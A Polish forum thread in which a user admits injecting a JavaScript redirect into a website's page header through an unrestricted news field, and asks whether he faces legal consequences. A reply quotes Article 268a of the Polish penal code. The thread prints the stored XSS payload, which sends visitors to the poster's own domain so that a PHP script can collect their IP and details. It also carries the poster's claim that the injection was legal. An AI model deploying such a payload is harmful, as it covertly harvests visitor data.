Dodanie kodu javascript na strone

• Autor wątku Autor wątku inwob
  • Data rozpoczęcia Data rozpoczęcia
I

inwob

Witam!
Ostatnio na pewien serwis dodałem kod w naglowku z przekierowaniem na moja domene. Moja domena przekierowywala potem znowu na ta sama domene.
Czy grozi mi cos jesli nie wyrzadzilem zadnych szkod, ani nawet nie dostalem sie do panelu administratora?
Pozdrawiam!

Strona byla tak ustawiona ze uzytkownik z poziomem 0 (normalnie poziom 3) Mogl dodawac krotkie newsy w ktorych mozna bylo dodac kod html
Jestem pewien ze nie wyrzadzilem zadnych strat finansowych

Ostatnia edycja:
No to w końcu html czy javascript? Przekierowanie da się też zrobić w "czystym" html-u. Takie coś:
Kod:
<script type="text/javascript">
zaczyna już js.
W sumie nie zrobiłeś nic bardzo "niszczycielskiego". Osoby odpowiedzialne za stronę powinny sobie z tym szybko poradzić (albo już sobie poradziły) ale może być i tak, że webmaster/rzy się "zdenerwuje/ją" i...
Kodeks karny:
Przepis prawny:
Art. 268a. § 1. Kto, nie będąc do tego uprawnionym, niszczy, uszkadza, usuwa, zmienia lub utrudnia dostęp do danych informatycznych albo w istotnym stopniu zakłóca lub uniemożliwia automatyczne przetwarzanie, gromadzenie lub przekazywanie takich danych, podlega karze pozbawienia wolności do lat 3.
§ 2. Kto, dopuszczając się czynu określonego w § 1, wyrządza znaczną szkodę majątkową, podlega karze pozbawienia wolności od 3 miesięcy do lat 5.
§ 3. Ściganie przestępstwa określonego w § 1 lub 2 następuje na wniosek pokrzywdzonego.

Po 3 minutach usunęły szkodę, a strona jest nadal tak ustawiona ze nawet ten kto nie ma administratora moze dodac swoj kod.
Szkody majatkowej nie bylo, nawet jesli byla to nie przekroczyla ona 5 zl.
Ten kod powtarzam zostal dodany legalnie bo kazdy mogl go dodac.
Kod byl taki
Kod:
<script>window.location="domena.pl/skrypt.php";</script>
Skrypt php
Kod:
Pobierz Ip, i wszystkie informacje o uzytkowniku
<script>window.location="staradomena.pl";</script>
Uprawiony do tego bylem, tak ustawil adminsitrator

Jeszcze pytanie na koniec.
Dostalem taki email
Kod:
 > Wszystkie logi z serwera oraz wszystkie powiązane z tym informacje
 > zostały  zabezpieczone i będą wysyłane do dostawcy internetu.
 > W późniejszym czasie sprawa zostanie skierowana do wydziału walki z
 > cyberprzestępczością komendy wojewódzkiej w Radomiu.

Czy operator moze cos zrobic?

Powrót